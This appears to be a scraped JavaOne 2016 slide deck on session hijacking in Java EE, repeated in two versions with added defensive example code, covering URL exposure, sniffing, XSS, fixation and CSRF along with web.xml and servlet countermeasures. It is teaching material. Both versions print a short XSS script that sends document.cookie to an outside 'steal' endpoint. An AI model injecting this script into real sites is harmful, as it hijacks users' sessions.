The Hacker's Guide to Session Hijacking in Java EE
Patrycja Wegrzynowicz
CTO, Yonita, Inc.
JavaOne 2016
About Me
• 15+ years of professional experience
• Software engineer, architect, head of software R&D
• Author and speaker
  • JavaOne, Devoxx, JavaZone, TheServerSide Java Symposium, Jazoon, OOPSLA, ASE, others
• Top 10 Women in Tech 2016 in Poland
• Founder and CTO of Yonita
  • Bridging the gap between the industry and the academia
  • Automated detection and refactoring of software defects
  • Trainings and code reviews
  • Security, performance, concurrency, databases
• Twitter: @yonlabs
Agenda
• HTTP, session, OWASP
• 4 demos to hijack a session
• Best practices in Java EE
Security Stories 2014-2015
Security Stories 2015-2016
HTTP
What Is a Web Session?
• HTTP itself is stateless; a session identifies the interactions with one user
• A unique identifier is associated with every request, carried as a
  • Cookie
  • Header
  • Parameter
  • Hidden field
OWASP Top 10 Risks
Session Hijacking
• Session theft
  • URL, sniffing, logs, XSS
• Session fixation
• Session prediction
Demo: Session Exposed in URL
• I will log into the sample application
• I will post a link with my session id on Twitter
  • @yonlabs
• Hijack my session :)
How to Avoid Session Id in URL?
• Default: the container allows both cookies and URL rewriting
  • Cookie by default, fall back on URL rewriting (;jsessionid=... appended to links)
  • To embrace all users
    • Disabled cookies in a browser
• Disable URL rewriting in an app server
  • App server specific
• Tracking mode
  • Java EE 6 (Servlet 3.0), web.xml
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
Session Sniffing
• How to find out a cookie?
  • e.g., network monitoring and packet sniffing
• How to use a cookie?
  • Browsers' plugins and add-ons (e.g., Cookie Manager for Firefox)
  • Intercepting proxy (e.g., OWASP ZAP)
  • DIY: write your own code
Demo: Session Sniffing
• You will log into the sample application
  • Any non-empty user name
  • Please, use meaningful names!
• I will monitor network traffic
  • tcpdump
• I will hijack one of your sessions
  • Cookie Manager
How to Avoid Session Exposure During Transport?
Encrypt! Use HTTPS.
web.xml
<security-constraint>
    <!-- A security-constraint needs at least one web-resource-collection;
         this one applies the transport guarantee to every URL of the app. -->
    <web-resource-collection>
        <web-resource-name>Entire application</web-resource-name>
        <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <user-data-constraint>
        <!-- CONFIDENTIAL: the container redirects plain HTTP requests to HTTPS -->
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
</security-constraint>
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <cookie-config>
        <secure>true</secure>
    </cookie-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
Session Exposure
• Transport
  • Unencrypted transport
• Client-side
  • XSS
  • Attacks on browsers/OS
• Server-side
  • Logs
  • Session replication
  • Memory dump
How to Steal a Session if Secure Transport Is Used?
Attack a client!
Demo: Session Grabbed by XSS
• JavaScript code to steal a cookie
• Servlet to log down stolen cookies
• Vulnerable application to be exploited via injected JavaScript code (XSS)
• I will store malicious JavaScript code in the app
  • Through writing an "opinion"
• Log into the vulnerable application
  • https://demo.yonita.com:8181/session-xss/
  • Any non-empty user name
  • Please, use meaningful names!
• Click the 'View others' opinions' page
• Wait until I hijack your session :)
JavaScript to Steal a Cookie
<script>
  // hacker's service that records whatever arrives in the query string
  var theft = 'http://demo.yonita.com/steal/steal?cookie=';
  // An image load is not blocked by the Same Origin Policy: the browser
  // requests the cross-origin URL and the cookie travels in it. The value
  // is URL-encoded so ';' and '=' inside the cookie survive the trip.
  var image = new Image();
  image.src = theft + encodeURIComponent(document.cookie);
</script>
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <cookie-config>
        <http-only>true</http-only>
        <secure>true</secure>
    </cookie-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
Session Fixation
• A session fixation attack exploits session creation: the attacker fixes the session id before the victim authenticates, so the victim's login happens inside a session the attacker already knows
When Is a Session Created?
A. On storing an attribute in a session for the first time
B. On calling request.getSession(true)/() for the first time
  • HttpServletRequest::getSession(true)
  • HttpServletRequest::getSession()
  • an implicit session object on JSP pages
    • unless <%@ page session="false" %>
C. On a successful login
D. None of the above
Answer: B. A session exists as soon as any code asks for one, and every JSP page asks implicitly unless it declares session="false"; logging in does not create or replace it by itself.
Session Fixation: Scenario 1
• Hacker opens a web page of a system in a browser
  • JSP page: a new session initialized!
• Hacker writes down the session id
• Hacker leaves the browser open
• User comes to the same machine and logs into the app
  • Uses the session initialized by the hacker
• Hacker uses the written-down session id to hijack the user's session
Session Fixation: Scenario 2
• Hacker opens a web page of a system in a browser
  • JSP page: a new session initialized!
• Hacker prepares a link with the session id in the URL
  • works only if the app accepts a session id from the URL, i.e., URL rewriting is still enabled
• Hacker tricks a user into clicking the link
  • e.g., sends an email with the link
• User clicks the link
  • Uses the session initialized by the hacker
• Hacker uses the written-down session id to hijack the user's session
Session Fixation: Solution
• Change the session ID after a successful login
  • more generally: after any escalation of privileges
Servlet 3.0/3.1 Spec
"Containers may create HTTP Session objects to track login state. If a developer creates a session while a user is not authenticated, and the container then authenticates the user, the session visible to developer code after login must be the same session object that was created prior to login occurring so that there is no loss of session information."
Session Fixation: Solution in Java EE
• Change the session ID after a successful login
  • more generally: after any escalation of privileges
• Java EE 7 (Servlet 3.1)
  • HttpServletRequest.changeSessionId(): same session object, new id
• Java EE 6
  • HttpSession.invalidate()
  • HttpServletRequest.getSession(true)
  • invalidate() discards the attributes, so copy the ones you need into the new session
Secure Session Management Best Practices
• Random, unpredictable session id
  • At least 128 bits (16 bytes) of randomness
• Secure transport and storage of session id
  • Cookie preferred over URL rewriting
  • Cookie flags: secure, httpOnly
  • Don't use too broad cookie paths
• Consistent use of HTTPS
  • Don't mix HTTP and HTTPS under the same domain/cookie path
Consistent Use of HTTPS: Typical Errors
• Static content served as HTTP from the same domain name
• Pre-authenticated pages as HTTP, post-authenticated pages as HTTPS from the same domain name
• Login form as HTTPS, the rest as HTTP
  • GMail for a few years after its launch!
Secure Authentication Best Practices
• Session creation and destruction
  • New session id after login
  • Logout button
  • Session timeouts: 2-5 minutes for critical apps, 15-30 minutes for typical apps
• Detecting session anomalies
  • Basic heuristic: a session associated with the headers of the first request
    • The fingerprint of the first request: IP, User-Agent, ...
    • If they don't match, something's going on (invalidate!)
  • OWASP ModSecurity Web Application Firewall
    • Rules for detecting common security attacks
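The "basic heuristic" and the idle timeout above, as an added example that is not code from the talk: a filter that binds a session to a hash of the client IP and User-Agent on the first request it sees, invalidates the session when a later request with the same cookie does not match, and sets the inactivity timeout. Package, class and attribute names and the 15-minute value are assumptions.

```java
// Added example (not from the talk): session fingerprint check plus idle
// timeout. Package, class, attribute name and timeout are assumptions.
package com.example.session;

import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

@WebFilter(urlPatterns = "/*")
public class SessionFingerprintFilter implements Filter {

    static final String FINGERPRINT_ATTR = "com.example.session.fingerprint";
    // 15 minutes: the deck's range for typical applications.
    static final int IDLE_TIMEOUT_SECONDS = 15 * 60;

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;

        // getSession(false): never create a session just to fingerprint it.
        HttpSession session = req.getSession(false);
        if (session != null) {
            String expected = (String) session.getAttribute(FINGERPRINT_ATTR);
            String actual = fingerprint(req);
            if (expected == null) {
                // First request seen for this session: bind it.
                session.setAttribute(FINGERPRINT_ATTR, actual);
                session.setMaxInactiveInterval(IDLE_TIMEOUT_SECONDS);
            } else if (!expected.equals(actual)) {
                // Same cookie, different client: treat the session as stolen.
                session.invalidate();
                resp.sendError(HttpServletResponse.SC_UNAUTHORIZED, "Session anomaly detected");
                return;
            }
        }
        chain.doFilter(request, response);
    }

    // SHA-256 of "ip|user-agent" so the session stores no raw client data.
    static String fingerprint(HttpServletRequest req) {
        String raw = req.getRemoteAddr() + "|" + String.valueOf(req.getHeader("User-Agent"));
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256")
                    .digest(raw.getBytes(StandardCharsets.UTF_8));
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 is required in every Java runtime", e);
        }
    }

    @Override public void init(FilterConfig filterConfig) { }
    @Override public void destroy() { }
}
```

The IP component is the noisy part: mobile users change address legitimately, and behind a proxy getRemoteAddr() is the proxy. Treat a mismatch as a signal to re-authenticate rather than a hard block if that is a problem, or bind only the User-Agent. Binding on the first request also means an attacker who fixated the session binds their own fingerprint, and the victim's first request then fails the check, which is the desired outcome.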
Secure Authentication Best Practices cont.
• Java EE
  • Declarative authentication implemented using descriptors
  • Programmatic authentication
    • Annotations, HttpServletRequest: authenticate, login, logout
  • Advanced flows and requirements
    • Custom implementation
• Servlet 3.0 vs 3.1
  • "the session visible to developer code after login must be the same session object that was created prior to login"
    • Session fixation problem
    • 3.0: no standard API to change a session id, only invalidate and recreate
    • 3.1: changeSessionId
  • Check out the container implementations
    • Java EE 6 vs. Java EE 7
Secure Authentication Best Practices cont.
• My choice
  • Declarative authentication with Java EE 7
    • Check out your application server behavior!
  • Programmatic authentication with Java EE 6, or when an advanced flow is needed in Java EE 7
    • HttpServletRequest: authenticate, login, logout
  • Custom implementation
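The programmatic login/logout API listed here and the session fixation fix from the earlier slides (Servlet 3.1 changeSessionId(), Servlet 3.0 invalidate-and-recreate) belong together, and the servlet below is an added example that is not code from the talk showing the two combined. The container version is detected through the ServletContext so the 3.0 path never touches the missing method. Package, class, URL and parameter names are assumptions.

```java
// Added example (not from the talk): programmatic login, session id renewal
// after authentication (3.1 or 3.0 path), and logout. Names are assumptions.
package com.example.auth;

import java.io.IOException;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

@WebServlet("/login")
public class LoginServlet extends HttpServlet {

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String user = req.getParameter("username");
        String password = req.getParameter("password");
        if (user == null || password == null) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "username and password required");
            return;
        }
        try {
            // Container-managed check against the configured realm (Servlet 3.0+).
            req.login(user, password);
        } catch (ServletException failed) {
            resp.sendError(HttpServletResponse.SC_UNAUTHORIZED, "Login failed");
            return;
        }
        // Privilege escalation just happened: the pre-login id must not survive it.
        HttpSession session = renewSessionId(req);
        session.setAttribute("user", req.getRemoteUser());
        resp.sendRedirect(req.getContextPath() + "/");
    }

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        // Logout button: end the container's authentication and drop the session.
        req.logout();
        HttpSession session = req.getSession(false);
        if (session != null) {
            session.invalidate();
        }
        resp.sendRedirect(req.getContextPath() + "/");
    }

    // Returns the session carrying the new id. Attributes survive in both
    // paths; on Servlet 3.0 they are copied by hand because invalidate()
    // discards them.
    static HttpSession renewSessionId(HttpServletRequest req) {
        HttpSession old = req.getSession(true);
        ServletContext ctx = req.getServletContext();
        boolean servlet31 = ctx.getMajorVersion() > 3
                || (ctx.getMajorVersion() == 3 && ctx.getMinorVersion() >= 1);
        if (servlet31) {
            req.changeSessionId();          // same object, new id, nothing lost
            return old;
        }
        Map<String, Object> attrs = new HashMap<>();
        for (String name : Collections.list(old.getAttributeNames())) {
            attrs.put(name, old.getAttribute(name));
        }
        old.invalidate();
        HttpSession fresh = req.getSession(true);
        for (Map.Entry<String, Object> e : attrs.entrySet()) {
            fresh.setAttribute(e.getKey(), e.getValue());
        }
        return fresh;
    }
}
```

Compiling against the Servlet 3.1 API while deploying to a 3.0 container is fine here because the call to changeSessionId() is only resolved when the guarded branch executes. Whether the container already renews the id on its own for FORM or programmatic login varies by product, which is the "check out your application server behavior" point: doing it explicitly costs nothing and removes the doubt.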
What If We Can't Steal a Cookie?
We can still use it!
Demo: CSRF to Use a Cookie
• I will log into the application
• Log into the application
  • https://demo.yonita.com:8181/session-csrf/
  • Any non-empty user name
  • Please, use meaningful names!
• Click the link and the button 'Click me'
  • https://demo.yonita.com:8181/attack-csrf/
• I will check my account balance :)
CSRF: Solution
• Use a unique token for each request
  • anti-CSRF token: bound to the session, sent with the request, and unreadable from the attacker's page
• Remember about your web forms and REST services
  • POST requests
  • Other state-changing HTTP actions as needed (PUT, DELETE, ...)
• Web framework dependent
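A synchronizer-token filter implementing the solution above, as an added example that is not code from the talk. A random token is bound to the session and every state-changing request must echo it, as a hidden form field for web forms or as a header for REST calls from JavaScript; the attacker's "Click me" page can make the browser attach the cookie but cannot read the token. Package, class, field, header and attribute names are assumptions.

```java
// Added example (not from the talk): anti-CSRF synchronizer token filter.
// Package, class, form-field, header and attribute names are assumptions.
package com.example.csrf;

import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashSet;
import java.util.Set;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

@WebFilter(urlPatterns = "/*")
public class CsrfTokenFilter implements Filter {

    static final String SESSION_ATTR = "com.example.csrf.token"; // where the token lives
    static final String REQUEST_ATTR = "csrfToken";              // ${csrfToken} in JSP/templates
    static final String FORM_FIELD = "_csrf";                    // <input type="hidden" name="_csrf">
    static final String HEADER = "X-CSRF-Token";                 // for fetch/XMLHttpRequest
    private static final Set<String> SAFE_METHODS =
            new HashSet<>(Arrays.asList("GET", "HEAD", "OPTIONS", "TRACE"));
    private static final SecureRandom RANDOM = new SecureRandom();

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        HttpSession session = req.getSession(false);

        if (session != null && !SAFE_METHODS.contains(req.getMethod())) {
            String expected = (String) session.getAttribute(SESSION_ATTR);
            String supplied = req.getHeader(HEADER);
            if (supplied == null) {
                supplied = req.getParameter(FORM_FIELD);
            }
            if (expected == null || supplied == null || !constantTimeEquals(expected, supplied)) {
                // The demo's cross-site form lands here: cookie present, token absent.
                resp.sendError(HttpServletResponse.SC_FORBIDDEN, "Missing or invalid CSRF token");
                return;
            }
        }

        // Expose the token to the page so forms and scripts can embed it.
        if (session != null) {
            req.setAttribute(REQUEST_ATTR, tokenFor(session));
        }
        chain.doFilter(request, response);
    }

    // One 256-bit token per session, created on first use. Call
    // session.removeAttribute(SESSION_ATTR) after login to rotate it.
    static String tokenFor(HttpSession session) {
        String token = (String) session.getAttribute(SESSION_ATTR);
        if (token == null) {
            byte[] bytes = new byte[32];
            RANDOM.nextBytes(bytes);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
            session.setAttribute(SESSION_ATTR, token);
        }
        return token;
    }

    // Timing-safe comparison so the token cannot be guessed byte by byte.
    static boolean constantTimeEquals(String a, String b) {
        return MessageDigest.isEqual(a.getBytes(StandardCharsets.UTF_8),
                                     b.getBytes(StandardCharsets.UTF_8));
    }

    @Override public void init(FilterConfig filterConfig) { }
    @Override public void destroy() { }
}
```

The deck asks for a token "for each request"; this filter uses one token per session, the common default, because rotating per request breaks the back button and multi-tab use. For a per-request variant, remove the session attribute after each successful check so the next page render issues a fresh one. Requests without a session are not checked because there is nothing to forge yet.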
Conclusion
You are never safe!
A fool with a tool is only a fool!
Continuous learning
Please, vote! :)
Q&A
• patrycja@yonita.com
• @yonlabs

Introduction to Matsuo Laboratory (ENG).pptx
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptx
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 

The Hacker's Guide To Session Hijacking

1. The Hacker's Guide to Session Hijacking in Java EE
  Patrycja Wegrzynowicz, CTO, Yonita, Inc.
  JavaOne 2016
4. Agenda
  • HTTP, session, OWASP
  • 4 demos to hijack a session
  • Best practices in Java EE
9. What Is a Web Session?
  • A session identifies the interactions with one user
  • Unique identifier associated with every request
    • Cookie
    • Header
    • Parameter
    • Hidden field
10. OWASP Top 10 Risks
12-14. Session Hijacking (built up over three slides)
  • Session theft
    • URL, sniffing, logs, XSS
  • Session fixation
  • Session prediction
15. Demo: Session Exposed in URL
  • I will log into the sample application
  • I will post a link with my session id on Twitter
    • @yonlabs
  • Hijack my session :)
16. How to Avoid the Session Id in the URL?
  • Default: the container allows both cookies and URL rewriting
    • Cookie by default, falling back on URL rewriting
    • To embrace all users
      • Cookies disabled in a browser
  • Disable URL rewriting in the app server
    • App server specific
  • Tracking mode
    • Java EE 6, web.xml
17. web.xml

    <!-- Java EE 6, Servlet 3.0 -->
    <session-config>
        <tracking-mode>COOKIE</tracking-mode>
    </session-config>
18. Session Sniffing
  • How to get hold of a cookie?
    • e.g., network monitoring and packet sniffing
  • How to use a cookie?
    • Browser plugins and add-ons (e.g., Cookie Manager for Firefox)
    • Intercepting proxy (e.g., OWASP ZAP)
    • DIY: write your own code
19. Demo: Session Sniffing
  • You will log into the sample application
    • Any non-empty user name
    • Please, use meaningful names!
  • I will monitor network traffic
    • tcpdump
  • I will hijack one of your sessions
    • Cookie Manager
20-21. How to Avoid Session Exposure During Transport?
  Encrypt! Use HTTPS.
22. web.xml

    <security-constraint>
        <!-- the schema requires a web-resource-collection; the slide omits it,
             the /* pattern below is an assumption -->
        <web-resource-collection>
            <web-resource-name>whole application</web-resource-name>
            <url-pattern>/*</url-pattern>
        </web-resource-collection>
        <user-data-constraint>
            <transport-guarantee>CONFIDENTIAL</transport-guarantee>
        </user-data-constraint>
    </security-constraint>
23. web.xml

    <!-- Java EE 6, Servlet 3.0 -->
    <session-config>
        <cookie-config>
            <secure>true</secure>
        </cookie-config>
        <tracking-mode>COOKIE</tracking-mode>
    </session-config>
24. Session Exposure
  • Transport
    • Unencrypted transport
  • Client-side
    • XSS
    • Attacks on browsers/OS
  • Server-side
    • Logs
    • Session replication
    • Memory dump
25-26. How to Steal a Session if Secure Transport Is Used?
  Attack a client!
27. Demo: Session Grabbed by XSS
  • JavaScript code to steal a cookie
  • Servlet to log the stolen cookies
  • Vulnerable application to be exploited via injected JavaScript code (XSS)
28. Demo: Session Grabbed by XSS
  • I will store malicious JavaScript code in the app
    • By writing an "opinion"
  • Log into the vulnerable application
    • https://demo.yonita.com:8181/session-xss/
    • Any non-empty user name
    • Please, use meaningful names!
  • Open the 'View others' opinions' page
  • Wait until I hijack your session :)
29. JavaScript to Steal a Cookie

    <script>
      // hacker's service
      var theft = 'http://demo.yonita.com/steal/steal?cookie=';
      // an image request is not restricted by the Same Origin Policy
      var image = new Image();
      image.src = theft + document.cookie;
    </script>
30. web.xml

    <!-- Java EE 6, Servlet 3.0 -->
    <session-config>
        <cookie-config>
            <http-only>true</http-only>
            <secure>true</secure>
        </cookie-config>
        <tracking-mode>COOKIE</tracking-mode>
    </session-config>
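The same hardening can be done in code instead of web.xml. The listener below is an added example, not code from the talk: it is the Servlet 3.0 programmatic equivalent of the descriptor fragments on slides 17, 23 and 30, run once at application start. The class name is an assumption; every API it calls is standard javax.servlet.

```java
import java.util.EnumSet;

import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.SessionCookieConfig;
import javax.servlet.SessionTrackingMode;
import javax.servlet.annotation.WebListener;

// Added example (not code from the talk): programmatic equivalent of the
// web.xml session-config shown on slides 17, 23 and 30. Must run before the
// context finishes initializing, which is exactly when contextInitialized fires.
@WebListener
public class SessionHardeningListener implements ServletContextListener {

    @Override
    public void contextInitialized(ServletContextEvent sce) {
        ServletContext ctx = sce.getServletContext();

        // Cookie only: no URL rewriting, so the id never ends up in links,
        // bookmarks, access logs or Referer headers (slides 15-17).
        ctx.setSessionTrackingModes(EnumSet.of(SessionTrackingMode.COOKIE));

        SessionCookieConfig cookie = ctx.getSessionCookieConfig();
        // HttpOnly: document.cookie no longer contains the id, so the script on
        // slide 29 ships an empty string to the hacker's service (slide 30).
        cookie.setHttpOnly(true);
        // Secure: the browser sends the cookie over HTTPS only (slides 21-23).
        cookie.setSecure(true);
        // Scope the cookie to this application rather than the whole host (slide 40).
        String path = ctx.getContextPath();
        cookie.setPath(path.isEmpty() ? "/" : path);
        // Negative max-age: a session cookie the browser does not persist to disk.
        cookie.setMaxAge(-1);

        ctx.log("effective session tracking modes: " + ctx.getEffectiveSessionTrackingModes());
    }

    @Override
    public void contextDestroyed(ServletContextEvent sce) {
        // nothing to release
    }
}
```

The log line at the end is the check worth keeping: if the container still reports URL as an effective tracking mode, some other configuration (a web.xml fragment in a library, a server-level default) is overriding the listener. HttpOnly stops the cookie from being read by script, but the browser still attaches it to every request, which is what the CSRF demo on slide 47 relies on.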
31. Session Fixation
  • A session fixation attack exploits the moment a session is created
32-33. When Is a Session Created?
  A. On storing an attribute in a session for the first time
  B. On calling request.getSession(true)/() for the first time
  C. On a successful login
  D. None of the above
34. When Is a Session Created?
  A. On storing an attribute in a session for the first time
  B. On calling request.getSession(true)/() for the first time
    • HttpServletRequest::getSession(true)
    • HttpServletRequest::getSession()
    • an implicit session object on JSP pages
      • unless <%@ page session="false" %>
  C. On a successful login
  D. None of the above
35. Session Fixation: Scenario 1
  • Hacker opens a web page of the system in a browser
    • JSP page: a new session is initialized!
  • Hacker writes down the session id
  • Hacker leaves the browser open
  • User comes and logs into the app
    • Uses the session initialized by the hacker
  • Hacker uses the written-down session id to hijack the user's session
36. Session Fixation: Scenario 2
  • Hacker opens a web page of the system in a browser
    • JSP page: a new session is initialized!
  • Hacker prepares a link with the session id in the URL
  • Hacker tricks a user into clicking the link
    • e.g. sends an email with the link
  • User clicks the link
    • Uses the session initialized by the hacker
  • Hacker uses the written-down session id to hijack the user's session
37. Session Fixation: Solution
  • Change the session ID after a successful login
    • more generally: after any escalation of privileges
38. Servlet 3.0/3.1 Spec
  • "Containers may create HTTP Session objects to track login state. If a developer creates a session while a user is not authenticated, and the container then authenticates the user, the session visible to developer code after login must be the same session object that was created prior to login occurring so that there is no loss of session information."
39. Session Fixation: Solution in Java EE
  • Change the session ID after a successful login
    • more generally: after any escalation of privileges
  • Java EE 7 (Servlet 3.1)
    • HttpServletRequest.changeSessionId()
  • Java EE 6
    • HttpSession.invalidate()
    • HttpServletRequest.getSession(true)
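As an added example (not code from the talk), here is a login servlet that applies slide 39: once the user has authenticated, the session id that existed before login is replaced, so an id planted by the attacker in scenarios 1 and 2 no longer names the victim's session. The Servlet 3.1 path is a single call; the Servlet 3.0 path is the invalidate-and-recreate dance with the attributes carried across. The servlet path, parameter names and the "user" attribute are assumptions, and req.login() needs a realm configured on the server.

```java
import java.io.IOException;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

// Added example (not code from the talk): rotate the session id on login so a
// fixed pre-login id (slides 35-36) becomes worthless. Names are assumptions.
@WebServlet("/login")
public class LoginServlet extends HttpServlet {

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String username = req.getParameter("username");
        String password = req.getParameter("password");
        try {
            // Programmatic, container-backed authentication (Servlet 3.0+, slide 43).
            req.login(username, password);
        } catch (ServletException badCredentials) {
            resp.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }

        // Privileges just escalated: the id the browser had before login must die here.
        rotateSessionIdServlet31(req);
        req.getSession().setAttribute("user", username);
        resp.sendRedirect(req.getContextPath() + "/");
    }

    /** Java EE 7 / Servlet 3.1: attributes stay, only the id (and the cookie) changes. */
    static String rotateSessionIdServlet31(HttpServletRequest req) {
        req.getSession(true);              // changeSessionId() needs an existing session
        return req.changeSessionId();
    }

    /**
     * Java EE 6 / Servlet 3.0 has no changeSessionId(): copy the attributes,
     * invalidate the old session and start a fresh one. On a 3.0 container call
     * this before req.login() and verify how your server keeps login state (slide 44).
     */
    static HttpSession rotateSessionIdServlet30(HttpServletRequest req) {
        Map<String, Object> saved = new HashMap<>();
        HttpSession old = req.getSession(false);
        if (old != null) {
            for (String name : Collections.list(old.getAttributeNames())) {
                saved.put(name, old.getAttribute(name));
            }
            old.invalidate();              // the fixed id stops resolving to anything
        }
        HttpSession fresh = req.getSession(true);
        for (Map.Entry<String, Object> entry : saved.entrySet()) {
            fresh.setAttribute(entry.getKey(), entry.getValue());
        }
        return fresh;
    }
}
```

The order matters on Servlet 3.0: the spec text on slide 38 lets the container tie the authenticated state to the session that existed at login time, so invalidating that session after login can log the user straight back out on some servers. Rotating before the credentials are checked avoids the problem at the cost of creating a session for failed attempts too, which is cheap compared with a fixed session.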
40. Secure Session Management Best Practices
  • Random, unpredictable session id
    • At least 16 characters
  • Secure transport and storage of the session id
    • Cookie preferred over URL rewriting
    • Cookie flags: secure, httpOnly
    • Don't use too broad cookie paths
  • Consistent use of HTTPS
    • Don't mix HTTP and HTTPS under the same domain/cookie path
41. Consistent Use of HTTPS: Typical Errors
  • Static content served over HTTP from the same domain name
  • Pre-authentication pages over HTTP, post-authentication pages over HTTPS, from the same domain name
  • Login form over HTTPS, the rest over HTTP
    • GMail for a few years after its launch!
42. Secure Authentication Best Practices
  • Session creation and destruction
    • New session id after login
    • Logout button
    • Session timeouts: 2-5 minutes for critical apps, 15-30 minutes for typical apps
  • Detecting session anomalies
    • Basic heuristic: associate the session with the headers of the first request
      • The fingerprint of the first request: IP, User-Agent, ...
      • If they don't match, something's going on (invalidate!)
    • OWASP ModSecurity Web Application Firewall
      • Rules for detecting common security attacks
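The anomaly heuristic on slide 42, written as a servlet filter. This is an added example, not code from the talk: on the first request that carries a session it stores a fingerprint built from the client address and User-Agent; on every later request it compares, and on a mismatch it logs the event, invalidates the session and rejects the request. The attribute name is an assumption.

```java
import java.io.IOException;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
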